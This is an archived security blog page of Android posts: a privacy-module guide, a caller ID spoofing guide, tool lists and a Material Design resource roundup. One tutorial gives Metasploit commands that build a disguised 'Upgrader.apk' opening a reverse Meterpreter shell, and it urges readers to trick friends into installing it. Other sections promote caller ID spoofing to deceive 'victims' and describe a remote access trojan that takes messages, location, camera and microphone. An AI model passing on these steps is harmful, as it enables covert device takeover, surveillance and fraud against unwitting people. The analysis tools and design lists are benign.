Never Ending Security

It starts all here

Category Archives: Android Devices

Xprivacy – A Must Have App For Hackers

Xprivacy - Must Have App For Hackers
Do you care about your privacy more than anything? This app is just for you then. Introducing Xprivacy…. A simple android application (module) that allows you to change the app permissions
Xprivacy is actually an xposed module developed by M. Bokhorst (M66B) to prevent leaking of your private data. It can restrict the categories of data an application can access. For example, the famous game Angry Birds acquires phone numbers for no reason, you can block AngryBirds from accessing the phone numbers by feeding it with no or fake data using Xprivacy.


75% of apps that you installed on your phone or tablet are accessing your private data without your knowledge (for no reason).
Why you should care about your privacy ? Honestly, I don’t want to talk the boring stuff. I just want to say “If you are vulnerable or careless about your privacy, you will become a target for hackers”. Just remember the incidents happened last year, snapchat hack, celebrity hacks (Fappening) and more. If you don’t want to be a victim of a hack, you know what to do — care about your privacy.
Ready to use XPrivacy? Then, here are the things you must have, to install XPrivacy.


  • Your device must have proper root access.
  • XPosed Installer (Updated Framework).
  • SuperSU/superuser/Busybox.
  • Android 4.0.3 or later
If your device have proper root access, download Xposed Installer and then install it in your device. Then open Xposed installer, tap on “Framework“.

It will show a pop up box saying “In some cases, your device might no longer boot after installing Xposed. If you never heard about ‘soft brick’ and ‘boot loop’ before or if you don’t know how to recover from such a situation, do not install Xposed. In any case, having a recent backup is highly recommended.

Tap on “OK“. Then tap on “Install/ Update“.

Now, a pop up box will display (super user request). Just tap on” Grant“.
After the update,  It will show a message like this:
Tap on  “OK“.
After rebooting your device, open Xposed Installer… Then tap on “Download“.
Search for “XPrivacy” and then tap on it. Then select the “versions” tab and tap on “Download
After the download, it automatically opens Xprivacy Install page. Tap on “Install“. Then tap on “Done“.
Then go to the Xposed Installer again and tap on “Modules“. Enable Xprivacy and then restart your device.
For Kitkat and Lollipop users, after installing the Xprivacy, the device will display a notification -“Xposed Module is not activated. Activate & Reboot“. Just tap on “Activate & Reboot“.
Now the Xprivacy is ready to use.


Step 1: Find the application to restrict in the main application list.
Step 2: Tap on the application icon or name.
Step 3: Tap the first check box of any category you want to restrict. The second checkbox allows you to restrict category or function on demand. That is, the restrictions will be asked.
If you have any doubts using it, refer this:
If you are a non-rooted device, you can get the app called “UU AppPurifier” to block applications from accessing your private data.

How To Spoof Caller ID

spoof caller ID

Quick guide to learn how to spoof caller ID:

Do you want to call your friend as someone else? If yes, you are at the right place.

Before going into the how to guide, let’s take a look at some of the reasons to spoof caller ID:

  • Prank calls.
  • Impress your friends by calling from unique numbers like 000-000-0000 or 123-456-7890.
  • Hide your real phone number.
  • Call someone from a number that you want them to call back.
Note: Most of the services described in this article are banned in India and some other countries, so….if you experience any trouble while accessing the services, use a proxy website.

Proxy website:

Let’s start caller ID spoofing!

  • Using Crazy Call:

First, go to, and then select your country from the drop down menu.

spoof caller id using crazy call
Then enter the number you want to appear on the victim’s phone when he/she receives the call. Also fill the second box with the number of the person (victim) you want to fool.
If you want to change your voice, you can change it to low pitch or high picth.
Then click on the ” GET ME A CODE” button.
The page will reload and display a unique code and phone numbers:
caller id spoofing
Make a call from your phone to one of those numbers and enter the code when asked.
As soon as you enter the correct code, CrazyCall will connect your call to the victim with the CallerID and voice you have selected.
There are many free (trial) caller id spoofing services available, some of them are given below:
how to spoof caller ID
SpoofCard is a very good service that allows users to call from any number. It also has some interesting features such as voice changer, sound mixer, call recorder and group spoof. You can try a live demo for free. If you want more minutes, you have to buy the credits.

caller id spoofing using bluff my call
BluffMyCall spoofing service offers new features such as “Straight To Voice Mail” and “Call Notes” along with the features offered by SpoofCard.

spoof caller id using caller id faker
Caller ID Faker is just like a normal spoofing service. It doesn’t have any new features. You can try the service for free, unlimited usage available for $29.95.

change my number to another spooftel

SpoofTel is a nice service with SMS spoofing feature. You can try the service for FREE, but if you want more minutes, you have to buy the credits.
Here are some apps to spoof caller ID using an Android device:
If you are using an android phone, you can use caller ID spoofing apps like Caller Id Changer, Spoof Card – Anonymous Calling and CallerIDFaker.
Here is an app to spoof caller ID on iPhone (Free iPhone App):
If you are using an iOS device, you can use the SpoofCard iOS app to spoof your phone number.

How To Remotely Hack Android using Kali Linux

This is a tutorial explaining how to hack android phones with Kali.
I can’t see any tutorials explaining this Hack/Exploit, so, I made one.
(Still ,you may already know about this)

Step 1: Fire-Up Kali:

  • Open a terminal, and make a Trojan .apk
  • You can do this by typing :
  • msfpayload android/meterpreter/reverse_tcp LHOST= R > /root/Upgrader.apk (replace LHOST with your own IP)
  • You can also hack android on WAN i.e. through Interet by using yourPublic/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)

Step 2: Open Another Terminal:

  • Open another terminal until the file is being produced.
  • Load metasploit console, by typing : msfconsole

Step 3: Set-Up a Listener:

  • After it loads(it will take time), load the multi-handler exploit by typing :use exploit/multi/handler
  • Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
  • To set L host type : set LHOST (Even if you are hacking on WAN type your private/internal IP here not the public/external)

Step 4: Exploit!

  • At last type: exploit to start the listener.
  • Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
  • Then send it using Uploading it to Dropbox or any sharing website (
  • Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
  • Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
  • However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
  • And when he clicks Open…

Step 5: BOOM!

There comes the meterpreter prompt:

See Meterpreter commands here:

Android Hacking Tools and Apps


Download Android Hacking Tools Package 1

RAR Password = sabeer


Download Android Hacking Tools Complete Package
RAR Password = sabeer


03.APK Inspector.
04.Droid Box
05.Burp Suite
07.Droid Sheep
09.AppUse (Android Pentest Platform Unified Standalone Environment)
10.Shark for Root

11.Android File Manager
12.Arc File Manager
13.OI File Manager
14.File Manager
15.Aroma File Manager 1.91

16.Dodol Keyboard
17.Emoji Keyboard.apk
18.Ice Cream Sandwich Keyboard.apk
19.Jelly Bean Keyboard.apk
20.Keyboard ManMan.apk
21.Kii Keyboard.apk
22.Magic Keyboard Free.apk
23.Perfect Keyboard Free.apk
24.Red Keyboard Free.apk
25.TouchPal Keyboard.apk
26.TouchPal X Keyboard.apk
27.Dynamic Keyboard – Pro v1.9.1

28.AVP Evolution v1.5.1
29.Kingdom Rush Frontiers v1.0
30.Pacific Rim v1.6.0
31.Shadowrun Returns v1.0.5
32.Sine Mora v1.24

33.Advanced Task Manager Pro v3.1.9
34.AppMgr Pro III (App 2 SD) v3.19
35.BackCountry Navigator PRO GPS v5.1.
36.edjing PE – Turntables DJ Mix v1.3.0
37.Sliding Messaging Pro v7.60
38.TuneIn Radio Pro v9.1
39.wRotatr v1.408
43.Google Chrome

47.Flow Theme for CM10.2 v2.9.7

48.TSF Shell v1.

Hackode : The Hackers Toolbox App


Hackode : The hacker’s Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc.

This Application contains different tools like:-

* Reconnaissance
* Google Hacking
* Google Dorks
* Whois
* Scanning
* Ping
* Traceroute
* DNS lookup
* IP
* MX Records
* DNS Dig
* Exploits
* Security Rss Feed

This Application is still in beta version. It will be releasing soon its full version with some more better tools and utilities. Stay tuned for more updates.

Download Now

Maldroid – An Simple Framework To Extract Actionable Data From Android Malware (C&Cs, phone numbers etc.) .


Simple framework to extract “actionable” data from Android malware (C&Cs, phone numbers etc.)


You have to install the following packets before you start using this project:

  • Androguard (git clone; cd androguard; sudo python install)
  • PyCrypto (easy_install pycrypto)
  • pyelftools (easy_install pyelftools)
  • yara (easy_install yara)


Idea is really simple and modular. The project has couple of directories, which host a place for you static analysis or output processing:

  • plugins – this is were the code responsible for the malware identification and data extraction is. Every class has to inherit from Plugin class from templates.
    • Method recon idetifies the malware – put there all of the code you need to make sure you can extract the data.
    • Method extract does the usual extraction. There is no specific format for the extracted data, but it’s good to keep it in Python dictionary, so that the ouput processors could read it in a uniform way.
  • processing – this is were you put classes that inherit from OutputProcessor class. They are invoked after the data extraction and get the extracted info.
    • process method takes the data and produces some kind of a result (i.e. adds a file or C&C to you database, checks if the C&C is live etc.)

If you want to contribute, write a plugin that decodes some new malware family. It’s easy, just look at the existing plugins.


So, you have an APK sample and you don’t know what it is and where is the C&C? Type:

python [sample_path]

If maldrolyzer knows the malware family it will display some useful information like:

{'c2': [''],
 'malware': 'xbot007',
 'md5': 'ce17e4b04536deac4672b98fbee905e0',
 'sha1': 'a48a2b8a5e1cae168ea42bd271f5b5a0c65f59a9',
 'sha256': 'c3a24d1df11baf2614d7b934afba897ce282f961e2988ac7fa85e270e3b3ea7d',
 'sha512': 'a47f3db765bff9a8d794031632a3cf98bffb3e833f90639b18be7e4642845da2ee106a8947338b9244f50b918a32f1a6a952bb18a1f86f8c176e81c2cb4862b9'}

And you can track the C&Cs from several malware families using

More information can be found at:

Best Android Tools For Security Audit and Hacking

Best Android Tools For Security Audit and Hacking

Security researchers have long maintained that malware is a problem on Android, the Google operating system that’s on 80% of the world’s smartphones. In extreme cases, hackers with malicious intent can do much more than send premium text messages.  In this post, we will see various apps for web application penetration testing, network penetration testing, sniffing, networking hacking and Android apps penetration testing.


Hackode : The hacker’s Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc.

This Application contains different tools like:

  • Reconnaissance
  • Google Hacking
  • Google Dorks
  • Whois
  • Scanning
  • Ping
  • Traceroute
  • DNS lookup
  • IP
  • MX Records
  • DNS Dig
  • Exploits
  • Security Rss Feed

This Application is still in beta version

Source && Download at:


Remote Administration Tool for Android. The name Androrat is a mix of Android and RAT (Remote Access Tool).

Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

All the available functionalities are

  • Get contacts (and all theirs informations)
  • Get call logs
  • Get all messages
  • Location by GPS/Network
  • Monitoring received messages in live
  • Monitoring phone state in live (call received, call sent, call missed..)
  • Take a picture from the camera
  • Stream sound from microphone (or other sources..)
  • Streaming video (for activity based client only)
  • Do a toast
  • Send a text message
  • Give call
  • Open an URL in the default browser
  • Do vibrate the phone

Source && Download at:


The goal of this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code. APKInspector provides both analysis functions and graphic features for the users to gain deep insight into the malicious apps:

  • CFG
  • Call Graph
  • Static Instrumentation
  • Permission Analysis
  • Dalvik codes
  • Smali codes
  • Java codes
  • APK Information

Source && Download at:


DroidBox is developed to offer dynamic analysis of Android applications. The following information is shown in the results, generated when analysis is ended:

  • Hashes for the analyzed package
  • Incoming/outgoing network data
  • File read and write operations
  • Started services and loaded classes through DexClassLoader
  • Information leaks via the network, file and SMS
  • Circumvented permissions
  • Cryptography operations performed using Android API
  • Listing broadcast receivers
  • Sent SMS and phone calls

Source && Download at:


zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.

These various pentest options include:

  • Network Map
  • Port Discovery
  • Packet Manipulation
  • Sniffer
  • MITM (Man in the Middle filters)
  • DoS (Pentest DoS vulnerabilities)
  • Password Complexity Audit
  • Penetrate CSE to check server/desktop vulnerabilty

Source && Download at:

Droid Sheep:

DroidSheep is a simple Android tool for web session hijacking (sidejacking). It listens for HTTP packets sent via a wireless (802.11) network connection and extracts the session id from these packets in order to reuse them.

DroidSheep can capture sessions using the libpcap library and supports: OPEN Networks WEP encrypted networks WPA and WPA2 encrypted networks (PSK only)

DroidSheep is not intended to steal identities or endamage anybody, but to show the weak security of non-ssl webservices

Source && Download at:


dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assessments on a mobile device.


  • WiFi Cracking
  • RouterPWN
  • Trace
  • Port Scanner
  • Inspector
  • Vulnerability finder
  • Login cracker
  • Packet forger
  • Man in the middle
  • Simple sniff
  • Password sniff
  • Session Hijacker
  • Kill connections
  • Redirect
  • Replace images
  • Replace videos
  • Script injector
  • Custom filter

Source && Download at:

AppUse – Android Pentest Platform Unified Standalone Environment:

AppUse Virtual Machine, developed by AppSec Labs, is a unique (and free) system, a platform for mobile application security testing in the android environment, and it includes unique custom-made tools.


  •  New Application Data Section
  •  Tree-view of the application’s folder/file structure
  •  Ability to pull files
  •  Ability to view files
  •  Ability to edit files
  •  Ability to extract databases
  •  Dynamic proxy managed via the Dashboard
  •  New application-reversing features
  •  Updated ReFrameworker tool
  •  Dynamic indicator for Android device status
  •  Bugs and functionality fixes

Source && Download at:

Shark for Root:

Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on tcpdump. Please leave comments/send e-mail if you have any problems/suggestions.

Source && Download at:

Android Device Testing Framework

The Android Device Testing Framework (“dtf”) is a data collection and analysis framework to help individuals answer the question: “Where are the vulnerabilities on this mobile device?” Dtf provides a modular approach and built-in APIs that allows testers to quickly create scripts to interact with their Android devices. The default download of dtf comes with multiple modules that allow testers to obtain information from their Android device, process this information into databases, and then start searching for vulnerabilities (all without requiring root privileges). These modules help you focus on changes made to AOSP components such as applications, frameworks, system services, as well as lower-level components such as binaries, libraries, and device drivers. In addition, you’ll be able to analyze new functionality implemented by the OEMs and other parties to find vulnerabilities.

Source && Download at:


drozer (formerly Mercury) is the leading security testing framework for Android.

drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps’ IPC endpoints and the underlying OS.

drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (MWR’s advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).

Source && Download at:


Neopwn is an advanced penetration testing and radio frequency auditing platform designed to run on mobile phones and tablets. We were the first to ever release a security auditing distribution for a mobile phone, and we continue to push the envelope in supporting the latest bleeding-edge tools and hardware.

Several options exist for local and remote control of the Neopwn system, including:

  • Android-based control panel application for system management
  • Desktop interface via VNC, for full X windows programs
  • Shell access with native Android terminal emulation applications
  • Quick application access with native Android desktop icon launchers
  • Remote access through VPN and SSH

Source && Download at:


Have you ever looked at your Android applications and wondered if they are watching you as well? Whether it’s a bandwidth-hogging app, aggressive adware or even malware, it would be interesting to know if they are doing more than what they are supposed to and if your personal information is exposed. Is there really a way to automatically evaluate all your apps – even hundreds of them – to harvest their behavioral data, analyze their run pattern, and at the same time provide an interface to facilitate a vast majority of evolving security tests with most practical solutions?

Android Security Evaluation Framework (ASEF) performs this analysis while alerting you about other possible issues. It will make you aware of unusual activities of your apps, will expose vulnerable components and help narrow down suspicious apps for further manual research. ASEF is an Open Source tool for scanning Android Devices for security evaluation. Users will gain access to security aspects of android apps by using this tool with its default settings

Source && Download at:


Reverse engineering, Malware and goodware analysis of Android applications … and more


  • Map and manipulate DEX/ODEX/APK/AXML/ARSC format into full Python objects,
  • Diassemble/Decompilation/Modification of DEX/ODEX/APK format,
  • Decompilation with the first native (directly from dalvik bytecodes to java source codes) dalvik decompiler (DAD),
  • Access to the static analysis of the code (basic blocks, instructions, permissions (with database from …) and create your own static analysis tool,
  • Analysis a bunch of android apps,
  • Analysis with ipython/Sublime Text Editor,
  • Diffing of android applications,
  • Measure the efficiency of obfuscators (proguard, …),
  • Determine if your application has been pirated (plagiarism/similarities/rip-off indicator),
  • Check if an android application is present in a database (malwares, goodwares ?),
  • Open source database of android malware (this opensource database is done on my free time, of course my free time is limited, so if you want to help, you are welcome !),
  • Detection of ad/open source librairies (WIP),
  • Risk indicator of malicious application,
  • Reverse engineering of applications (goodwares, malwares),
  • Transform Android’s binary xml (like AndroidManifest.xml) into classic xml,
  • Visualize your application with gephi (gexf format), or with cytoscape (xgmml format), or PNG/DOT output,
  • Integration with external decompilers (JAD+dex2jar/DED/…)
  • ….

Source && Download at:


Nicknamed as the “Smartphone Version of Backtrack”, Revenssis Penetration Suite is a set of all the useful types of tools used in Computer and Web Application security. Tools available in it include: Web App scanners, Encode/Decode & Hashing tools, Vulnerability Research Lab, Forensics Lab, plus the must-have utilities (Shell, SSH, DNS/WHOIS Lookup, Traceroute, Port Scanner, Spam DB Lookup, Netstat… etc). All these fitting in an application approx. 10MB (post installation).


  • All Web Vulnerability Scanners including:
  • SQL injection scanner
  • XSS scanner
  • DDOS scanner
  • CSRF scanner
  • SSL misconfiguration scanner
  • Remote and Local File Inclusion (RFI/LFI) scanners
  • Useful utilities such as:
  • WHOIS lookup, IP finder, Shell, SSH, Blacklist lookup tool, Ping tool,
  • Forensic tools (in imlementation) such as malware analyzers, hash crackers, network sniffer, ZIP/RAR password finder, social engineering toolset, reverse engineering tool
  • Vulnerability research lab (sources include: Shodan vulnerability search engine, ExploitSearch, Exploit DB, OSVDB and NVD NIST
  • Self scan and Defence tools for your Android phone against vulnerabilities
  • Connectivity Security Tools for Bluetooth, Wifi and Internet. (NFC, Wifi Direct and USB in implementation)

Source && Download at:

SPF – Smartphone Pentest Framework

The product of a DARPA Cyber Fast Track grant, the Smartphone Pentest Framework is an open source security tool, designed to aid in assessing the security posture of smartphones in an environment. SPF Version 0.1 contains remote attacks, client side attacks, social engineering attacks, and post exploitation, targeting smartphone devices.

Source && Download at:


Bugtroid is an innovative tool developed by the team of Bugtraq-Team. The main features of this apk, is that it has more than 200 Android and Linux tools (PRO) for pentesting and forensics through smarthphone or tablet.

Source && Download at:

OWASP Droid Fusion

OWASP Droid Fusion is a platform for android mobile or any other mobile for doing Malware Analysis, Development, Application Pentesting and Forensics. You can use it in any mobile security research, and if you have Droid Fusion, you don’t need to worry about finding tools. There are more then 60 tools and scripts and it is free.

Source && Download at:

Android Device Testing Framework (“dtf”)

Android Device Testing Framework

The Android Device Testing Framework (“dtf”) is a data collection and analysis framework to help individuals answer the question: “Where are the vulnerabilities on this mobile device?” Dtf provides a modular approach and built-in APIs that allows testers to quickly create scripts to interact with their Android devices. The default download of dtf comes with multiple modules that allow testers to obtain information from their Android device, process this information into databases, and then start searching for vulnerabilities (all without requiring root privileges). These modules help you focus on changes made to AOSP components such as applications, frameworks, system services, as well as lower-level components such as binaries, libraries, and device drivers. In addition, you’ll be able to analyze new functionality implemented by the OEMs and other parties to find vulnerabilities.


To use dtf, you will need at least the following:

  • JRE 1.7
  • Python 2.6 or higher
  • A true Bash shell (no Dash!!!), with general purpose Linux utilities (sed, awk, etc.)
  • sqlite3
  • The Android SDK

Downloading, Configuring, and Installing

First, you’ll want to download the core component of dtf from GitHub:

user@testing$ git clone dtf/

You’ll need to add dtf to your path, as well as the Android SDK tools (so that dtf knows about “adb” and “aapt”). If you want to use the auto completion features of dtf, you have a few choices. You can source the file “” in your “.bashrc”, copy “ to “/etc/bash_completion.d/” (if you are already sourcing this in your “.bashrc”), or just run:

user@testing$ . dtf/

To confirm dtf is working, try the command:

user@testing$ dtf -h

If you see the dtf help screen with no errors, you are good to go!

Getting Modules

Dtf is just a framework. Without installing actual content, it doesn’t do anything! The modules that I use are available below, depending on your needs. For first time users, I recommend grabbing the core module content “” and the “” for the version(s) of Android you plan on testing (you’ll need the aosp-data-x packages for using some modules).


More information can be found at: and at:

35 Great Resources for Google Material Design

Google introduced the new design language “Material design” at the Google I/O conference on 25th June 2014. It focuses on grid based layouts, padding, floating action buttons, responsive transitions, depth effects like lightning and shadows. Unlike real paper, material design can expand and reform intelligently. With the addition of tactile surfaces, fluid motion and bold graphic design, it allows designers and developers to build more colorful, flexible and compelling application for web, Android and Chrome OS.

If you are finding a way to explore Material design and its usage in your project, here are 34 helpful resources which will help you to make your application/web more attractive.

35. Animated Tabs

Animated Tabs

Polymer app without canvas and polymer. You can use only CSS3 and pure JavaScript.

34. Modern Loader

Modern Loader

A modern Google spinning loader in pure CSS, animating through four colors.

33. Material Design Preloader

Material Design Preloader

A jQuery plugin that recreates the material design preloader as shown above.

32. Material Design Navigation

Material Design Navigation

The pages slide to reveal a clean, simple and smooth navigation.

31. Switch Theme

Switch Theme

A simple and elegant switch theme from Google material design (by Zhoolego).

30. PC Icons

PC Icons

A few material design icons for PCs.

29. Material Shadows


The authentic design shadows without web components, designed by Ben Strahan.

28. Menu CSS

Menu CSS

material design menu with amazing hover effect. Just copy the given CSS and HTML code to your project.

27. Radio Input

Radio Input

This is the custom radio input (CSS only), designed by Christian Hall.

26. The Morphing Icons


The morphing icons are designed by Alberto Bonvicin. Currently, it cycles through the radios randomly or you can change to cycle in order, starting with checked elements.

25. Material Design Form

Material Design Form

A simple and quick material design login form with ripple effect, designed by Josh Adamous.

24. Animation Timing

animation timing

A smart and beautiful animation timing based on material design, created by Sergey Kupletsky.

23. Material Design Buttons

Material Design Buttons

The script automatically (written by Michaela) adds the material design effect to elements with “material design” class. Just add the preferred color as “data-color” attribute. You can also use it on div with images.

22. Product Icon Anatomy


This is animated version of the product icon anatomy guideline from Google material design, created by Jovie Brett.

21. Material Palette

Material Palette

Select your favorite color(s) and get your material design color palette (along with the preview).

20. Material Icons Deconstruction

Material Icons Deconstruction

This is finished clone of delightful details. You can build these kinds of deconstruction just by using HTML and CSS. Users need to click on each section to toggle between icons.

19. Material Interaction

Material Interaction

The page shows the interactive experiences of Material design principle.

18. Ripple Click Effect

Ripple Click Effect

This is kind of click effect which includes an ink-drop like element that moves out rapidly from the position where the user clicks/taps. The simple logic here is to create circles (with smooth transition) at click coordinates behind the links.

17. Hover and Click Effect

Hover and Click Effect

Yet another hover and click effect, in addition with a mixture of different colors which makes it more appealing.

16. The Tiles

The Tiles

The Material design CSS based tiles, created by Sergey Kupletsky.

15. Material Design Icons

Material Design Icons

These are official open source icons featured in the Google material design specification. It includes SVG, PNG and hi-dpi versions of all icons in 24px & 48px.

14. Free Sketch, Templates and Icons

Free Sketch, Templates and Icons

This is a quick start sketch template that includes 424 Android L icons, mobile, tablet and desktop layouts and all the polymer project web component elements.

13. Material Design Icon Expanded

Material Design Icon Expanded

A huge collection that includes over 1400 icons in SVG & PNG format, available in several sizes.

12. Material Design for Bootstrap

Material Design for Bootstrap

It’s a theme for Bootstrap 3 that lets you use the Google material design in your favorite front-end framework. Just include the theme after CSS and include JavaScript at the end of your code (before </body> tag).

11. Material Design for AngularJS

Material Design for AngularJS

It’s a specification for a unified system of motion, visual and interaction design for all devices. It consists of lightweight and clean AngularJS native user interface elements that can be used in single page applications.

10. Lollipop GUI Kit

Lollipop GUI Kit

This is Android’s Lollipop xxhdpi graphical user interface kit designed by Sandip D.

9. Lollipop GUI -2

Lollipop GUI -2

This is Android Lollipop 5.0 PSD with all screens including splash, call, notification, inbox, email, manage file and contact feed screen.

8. Material UI kit

Material UI kit

All new material UI kit (HTML + CSS), designed by UltraLinx. Here’s the demo.

7. Lollipop Material Design UI kit

Lollipop Material Design UI kit

This is the Android Lollipop Material design UI kit for sketch, designed by Ivan Bjelajac. The use cases are based on common UX flows in Android app.

6. Material Design Hamburger

Material Design Hamburger

Android’s material design hamburger is built in CSS that currently supports the latest version of all major browsers. Just download the latest release and include the CSS & JS files from the dist folder where desired within your project.

5. Android Music App

Android Music App

Wanna create a music app? The design is ready for you. It includes home screen, login, my music, contacts, sidebar, top playlist, news feed, player, album view and user playlist screen. Available for $15.

4. Materialize


Materialize is the modern, responsive front-end framework based on material design. It includes tons of gorgeous elements and components like badges, buttons, cards, preloader, icons, colors, grid, form, table, media, shadow, typography and much more.

3. LumX


LumX is the responsive front-end framework based on Angular JS and material design specification. It is built on Google guideline, respecting metrics in pixel perfect way.

2. Material UI

Material UI

It’s a CSS framework and a group of react components that implement Google’s material design. For better understanding start with the React library before diving into material UI.

1. Polymer


Polymer is a large library that uses latest web technology to let you create HTML elements. You can build anything from a small button to a complete application as an encapsulated, reusable element that works on all devices.

40+ Useful Tools for Developing Android Apps

You don’t need to spend thousands of dollars and months of work to enter the mobile market. If you want to create an app for your business, blog, product or service, all you need is knowledge of Java and right combination of tools. Today, thousands of software/web tools are available out there to get you started. We’ve made a small attempt to minimize your development efforts. This article includes everything you need to develop, test, monetize, analyze and enhance your app. No matter who you are or on what scale you wanna develop, these tools will help you build more polished Android apps with the biggest chance of meeting your target. Here we go…

Note: You need to buy free version tools to unlock all advanced features.

41. JSONView


JSONView is a small Firefox extension that lets you view JSON document in the browser. The document is well formatted, highlighted and objects and arrays can be collapsed.

40. Android GUI Set

Android GUI set

This is free Android GUI set including Photoshop files. It consists of main menu, keyboard, status bar, browser, screen label, slider, contact list, circle buttons, radio, option panel and many more interfaces.

39. XAppDbg


XAppDbg is an app development tool (by Sony) which is used to change parameters of code during runtime. This can save you a lot of time, since you don’t have to test/run your app for each tiny change.
Price: Free

38. Android Holo Colors Generator

Android Holo Colors Generator

This holo color creator allows you to create beautiful Android components like spinner/editext with your own colors for your apps. It will generate necessary patch assets, XML drawables and styles which you can copy direct into your project.
Price: Free

37. Android Action Bar Style Generator

Android Action Bar Style Generator

This action bar generator allows you to create attractive custom action bar style for your Android app. It will create necessary patch assets, styles and XML drawables that you can apply direct to your application.
Price: Free

36. TestObject


TestObject helps Android developers make test scenarios, record them and execute them. It gives you the facility to access over 120 real Android devices right from your browser. Errors are detected automatically, like security exception, illegal state, null pointer etc.
Price: Starting at 89 per month.

35. Bizness Apps

Bizness Apps

This is an affordable app maker for simple and small businesses. Select the pre-designed template or start from scratch. You can design and implement (without coding) your own artistic style with their amazing features set. Publish and promote your app and track your user base plus return on investment.
Price: Starts at $29 per month.

34. Splunk


Splunk monitors the performance and usage of your apps. Just one line installation and you’ll receive complete error information, event analytics, real time transactions and network monitoring reports.
Price: Free for apps with 1 thousand monthly active users.

33. Ubertesters


Ubertesters is a complete mobile app testing tool that lets you organize, execute, control and monitor your app beta testing process. It supports in-app bug editing, over-the-air (OTA) app distribution, real time monitoring and integration with external bug tracking system.
Price: Free for up to 5 users.

32. Android Layout Binder

Android Layout Binder

Android Layout Binder converts your XML layouts into a set of decelerations. You need to enter the prefix of your field, select the mode and enter the Layout XML.
Price: Free

31. Jsonstub


Jsonstub allows you to fake (mockup) the back-end while you develop the front-end. All you need is your favorite JavaScript framework or mobile development environment to start building apps. It can be used simultaneously by those who work on the client and those who work on the services.
Price: Free

  1. Mobile Dev HQ

Mobile Dev HQ

It’s an SEO (Search engine optimization) for mobile apps. Their data provide the best keywords based on relevance, difficulty and search volume. You will be able to track your search ranking positions for specific keywords.
Price: Free for tracking up to 10 apps.

29. APKAnalyser


APKAnalyser is static and virtual analysis tool that can be used view app architecture, dependencies, API references and disassemble bytecodes in Android apps. It allows you to explore packages, classes, methods, fields, decode Android XML files and modify APK file.
Price: Free

28. GitEye


GitEye (by CollabNet) combines simple and powerful graphical Git client with central visibility into essential developer tasks like agile planning, defect tracking, code reviews and build tools. You can integrate it with CloudForge, TeamForge, Jira, BugZilla, GitHub and more.
Price: Starts at $350 per month.

27. Push IO

Push IO

The Oracle Push Cloud Service is an enterprise class push notification platform designed to meet the needs of modern marketers and world’s best apps. It provides lightweight SDK, powerful APIs and Web Dashboard to target users based on geo-location, preferences and device metrics.
Price: As per the project.

26. LiveCode


LiveCode is English-like language for developing Android and iPhone apps. Here you can develop live prototypes that use the full capabilities of mobile devices and deploy to whatever platform your customers need. Moreover, it is packed with numerous tutorials to help you along the way.
Price: Starts at $299 per year.



GENWI is smartphone and tablet publishing platform that allows you to create and manage your presence on all popular mobile devices. It delivers rich graphics, images, videos, audio, interaction and revenue generating capabilities for businesses like in-app subscription, coupons, ads etc.
Price: As per the project.

24. Applause


Applause is wild testing platform that provides the feedback from testers and users. It reports in-app bugs, automatic crashes and in-app user feedback. Moreover, the Applause SDK automatically keeps your testers up to date with the latest build of your app, ensuring they all are focused on the version that matters the most.
Price: As per the project.

23. BitBucket


BitBucket is a web-based hosting service for project that uses GIT OR MERCURIAL. It allows you to work as a team, pull requests, review codes and share unlimited private repositories.
Price: Free for 5 users.

22. App Icon Sizes

App Icon Sizes

At some stage of mobile app development process, you will need splash screens, icons and default Android graphics. This need is fulfilled by AppIconSizes. It generates all necessary files from single image and creates the correct folder structure which Android requires.
Price: Free (no ads, no watermarks)

21. Android Icon Generator

Android Icon Generator

This icon generator allows you to easily generate icons from existing source clipart, text and images. Here you can create launcher icons, notification icons, generic icons, action bar and tab icons.
Price: Free

20. IBM Mobile Push Notification

IBM Mobile Push Notification

IBM mobile push notification offers a flexible and easy to use environment for building notification campaigns which engage mobile app users at the optimal time and location. You can target communications according to your business rules, customer behavior, customer relationship management and current segmentation.
Price: Based on the project.

19. Spoon


Spoon distributes the instrumentation tests execution and shows the results in a meaningful way. It is packed with a device view that outlines the results of each test one a single device and a test view which shows the results of a single test across all of the devices it was executed on.
Price: Free

18. Kendo UI

Kendo UI

Kendo UI includes everything for building mobile and web apps with HTML5 and JavaScript. Over 70 jQuery-based UI widgets are packed in one tool. Kendo also supports Angular JS integration, mobile controls, Bootstrap and offline data solution.
Price: $699

  1. Cenzic


Cenzic Mobile is a security service to protect the data on the latest online front. It uses Hailstorm technology to analyze mobile application and detect vulnerabilities in critical areas such as input validation authentication mechanism, session security and encryption usage.
Price: As per the project.

16. MyAppBuilder


MyAppBuilder uses phone gap framework for creating apps using standardized web API’s of the platform you like. The apps are created using web technologies like JavaScript, HTML and CSS. You can build apps for author/publisher, real estate, restaurants, digital goods, bands, sports, news, car dealership, nonprofits, tickets, events and more.
Price: Starts at $9 per month.

15. Pubnub


Pubnub is super-fast cloud hosted messaging service for real time apps. Send and listen to events within your app using simple publish and subscribe API calls. You can stream, store, sync, protect and manage data to any device, anywhere.
Price: Free for up to 1 million messages per month.

14. SwebApps


SwebApps provides a platform to create web apps and native Android apps. It is built to handle small as well as large scale applications. You can add photos, videos, audio files, documents, event details and there are categories and subcategories for all organizational freaks.
